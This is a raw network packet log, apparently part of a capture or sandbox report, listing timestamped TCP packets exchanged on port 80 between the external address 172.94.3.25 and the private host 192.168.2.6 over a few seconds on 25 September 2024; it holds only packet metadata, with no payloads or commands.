Sep 25, 2024 16:03:47.632853985 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.632875919 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.632956028 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.632956982 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.632997036 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.633013964 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.633042097 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.633080006 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.633100986 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.633111954 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.633124113 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.633131027 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.633153915 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.633210897 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.633223057 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.633233070 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.633244991 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.633265972 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.633294106 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.633438110 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.633449078 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.633460045 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.633471012 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.633486986 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.633502007 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.642987013 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.643071890 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.643121004 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.710876942 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.710896015 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.710915089 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.710928917 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.710938931 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.710952044 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.710966110 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.711005926 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.711078882 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.711091042 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.711102009 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.711111069 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.711114883 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.711129904 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.711410046 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.711421967 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.711433887 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.711462975 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.711486101 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.711534023 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.711544991 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.711558104 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.711577892 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.711587906 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.711601019 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.711611032 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.711616039 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.711642027 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.789067984 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.789093971 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.789105892 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.789135933 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.789145947 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.789158106 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.789169073 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.789180994 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.789196968 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.789218903 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.789230108 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.789242983 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.789259911 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.789282084 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.789370060 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.789402008 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.789433956 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.789443016 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.789453983 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.789479971 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.789598942 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.789632082 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.789685965 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.789695978 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.789726019 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.789760113 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.789768934 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.789779902 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.789792061 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.789799929 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.789824963 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.867280006 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.867316008 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.867398024 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.867424011 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.867435932 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.867446899 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.867481947 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.867491961 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.867508888 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.867528915 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.867609024 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.867619991 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.867634058 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.867640972 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.867660046 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.867667913 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.867681026 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.867691040 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.867714882 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.867806911 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.867818117 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.867829084 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.867846966 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.867866039 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.867873907 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.867877960 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.867888927 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.867903948 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.921144962 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.945509911 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.945537090 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.945549011 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.945570946 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.945782900 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.945795059 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.945806980 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.945816994 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.945837021 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.945842028 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.945848942 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.945862055 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.945892096 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.945926905 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.945938110 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.945950031 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.945965052 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.945986032 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.946019888 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.946028948 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.946041107 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.946050882 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.946072102 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.946096897 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.946150064 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.946160078 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.946171045 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.946190119 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.999320030 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.623970032 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.623997927 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.624012947 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.624079943 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.624134064 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.624146938 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.624207973 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.624207973 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.624228001 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.624239922 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.624248028 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.624252081 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.624262094 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.624280930 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.624291897 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.624299049 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.624299049 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.624301910 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.624326944 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.624349117 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.624358892 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.624370098 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.624381065 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.624396086 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.624432087 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.624444008 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.624455929 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.624466896 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.624504089 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.624545097 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.702781916 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.702799082 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.702819109 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.702832937 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.702847004 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.702862024 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.702874899 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.702888966 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.703080893 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.703139067 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.703160048 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.703174114 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.703186989 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.703201056 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.703202963 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.703212023 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.703263044 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.703263044 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.703674078 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.703687906 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.703699112 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.703711033 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.703763962 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.703892946 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.712554932 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.712577105 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.712996960 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.781019926 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.781039953 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.781053066 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.781064987 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.781076908 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.781096935 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.781111956 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.781126022 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.781218052 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.781229973 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.781249046 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.781250000 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.781249046 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.781277895 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.781289101 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.781299114 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.781315088 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.781315088 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.781369925 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.781524897 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.781578064 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.781589985 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.781665087 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.828130960 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.828150988 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.828164101 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.828277111 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.859292030 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.859319925 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.859332085 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.859342098 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.859354973 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.859369993 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.859390020 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.859404087 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.859417915 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.859430075 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.859445095 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.859461069 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.859477043 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.859477043 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.859500885 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.859513044 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.859515905 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.859565973 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.905714035 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.905961037 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.905976057 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.905992985 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.906088114 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.936847925 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.936861992 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.936873913 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.936918020 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.936974049 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.936984062 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.936986923 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.937130928 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.937155962 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.937241077 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.937247038 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.937251091 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.937299967 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.937309027 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.937320948 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.937333107 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.937345982 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.937360048 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.937395096 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.947485924 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.947510004 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.947618008 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.984010935 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.984034061 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.984045029 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.984056950 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:49.984078884 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:49.984266043 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.014961004 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.014976025 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.014988899 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.015002012 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.015028000 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.015028000 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.015033007 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.015149117 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.015172005 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.015194893 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.015227079 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.015239954 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.015259027 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.015290976 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.015302896 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.015316010 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.015326023 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.015327930 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.015358925 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.015358925 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.015389919 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.015402079 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.015436888 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.061949968 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.062006950 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.062017918 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.062028885 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.062061071 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.062114000 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.093034983 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.093054056 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.093067884 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.093146086 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.093251944 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.093280077 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.093295097 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.093296051 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.093308926 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.093322039 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.093333006 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.093347073 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.093374014 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.093374014 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.093404055 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.093517065 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.093535900 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.093547106 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.093556881 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.093585968 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.093656063 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:50.103372097 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.103741884 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:50.103873014 CEST	49715	80	192.168.2.6	172.94.3.25
